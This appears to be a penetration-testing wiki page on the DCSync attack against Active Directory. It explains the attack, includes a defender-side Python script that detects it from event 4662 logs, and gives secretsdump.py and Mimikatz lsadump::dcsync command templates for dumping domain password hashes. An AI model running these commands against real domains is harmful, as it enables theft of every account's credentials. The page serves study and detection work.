# DCSync

DCSync is an attack in which the attacker impersonates a Domain Controller and asks a legitimate one to replicate directory data to it, obtaining sensitive information such as the password hashes held in the NTDS.dit database without ever touching the file itself.

{% hint style="info" %}
An account on the target domain with *Replicate Directory Changes* rights is required in order to attempt a DCSync attack.

By default, domain administrators, enterprise administrators, and domain controllers have *Replicate Directory Changes* rights. However, I've run into cases where non-privileged accounts are accidentally given these rights.
{% endhint %}

This attack relies on the Directory Replication Service RPC interface (DRSUAPI), specified in the Directory Replication Service Remote (MS-DRSR) protocol, which Domain Controllers use to replicate directory data between each other.

The attacker issues a *GetNCChanges* request (IDL_DRSGetNCChanges in MS-DRSR) over DRSUAPI to ask a legitimate Domain Controller for AD objects, and the Domain Controller answers with a replication structure that contains the requested attributes, including usernames and password hashes.
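As an added defender-side example (not part of the original page), a small Python check over constructed, flattened Security event 4662 records: a GetNCChanges request is audited as a 4662 event whose Properties field carries the DS-Replication-Get-Changes control-access-right GUIDs, and flagging any principal other than a Domain Controller account that exercises them is the standard DCSync detection. The log line format and account names are constructed; the GUIDs are the real control-access-right GUIDs.

```python
import re

# Control-access-right GUIDs that appear in the "Properties" field of
# Windows Security event 4662 when a caller exercises replication rights.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def parse_4662(line):
    """Parse a flattened 'key=value; key=value' record into a dict (constructed format)."""
    fields = {}
    for part in line.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def replication_alerts(lines, dc_accounts):
    """Return (account, right) pairs for 4662 events where a principal that is
    not a Domain Controller computer account used a replication right."""
    known_dcs = {a.upper() for a in dc_accounts}
    alerts = []
    for line in lines:
        event = parse_4662(line)
        if event.get("EventID") != "4662":
            continue
        account = event.get("SubjectUserName", "")
        if account.upper() in known_dcs:
            continue  # DC-to-DC replication is expected traffic
        for guid in GUID_RE.findall(event.get("Properties", "")):
            right = REPLICATION_GUIDS.get(guid.lower())
            if right:
                alerts.append((account, right))
    return alerts


# Constructed sample events, not real log data. A DCSync run typically
# exercises both Get-Changes and Get-Changes-All in one request.
SAMPLE_LOG = [
    "EventID=4662; SubjectUserName=DC01$; Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectUserName=svc_backup; Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectUserName=jsmith; Properties={bf967a86-0de6-11d0-a285-00aa003049e2}",
]

if __name__ == "__main__":
    for account, right in replication_alerts(SAMPLE_LOG, {"DC01$"}):
        print(f"ALERT: {account} exercised {right}")
```

Event 4662 is only written when the Directory Service Access audit subcategory is enabled and the domain object's SACL covers these control-access rights, so confirm that auditing is in place before relying on this check.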

## Exploit

{% tabs %}
{% tab title="secretsdump.py" %}
{% code title="Linux" %}

```fish
secretsdump.py [domain/]username[:password]@<target DC> <options>

OPTIONS
-just-dc                    Extract Only NTDS.dit Data (NTLM/Kerberos Keys)
-just-dc-ntlm               Extract Only NTDS.dit Data (NTLM Only)
-just-dc-user [username]    Extract Only NTDS.dit Data For Specified User
-user-status                Display If The User Is Disabled
-history                    Dump Password History
-outputfile                 Base Output Filename

-hashes                     Authenticate Using LMHASH:NTHASH
-k                          Use Kerberos Auth From ccache File
```

{% endcode %}
{% endtab %}

{% tab title="Mimikatz" %}
{% code title="Windows" %}

```powershell
lsadump::dcsync <options>

OPTIONS
/domain:[domain]        Domain
/user:[user]            Target Domain User To Obtain Credentials For
/dc:[DC FQDN]           Domain Controller To Target
```

{% endcode %}
{% endtab %}
{% endtabs %}
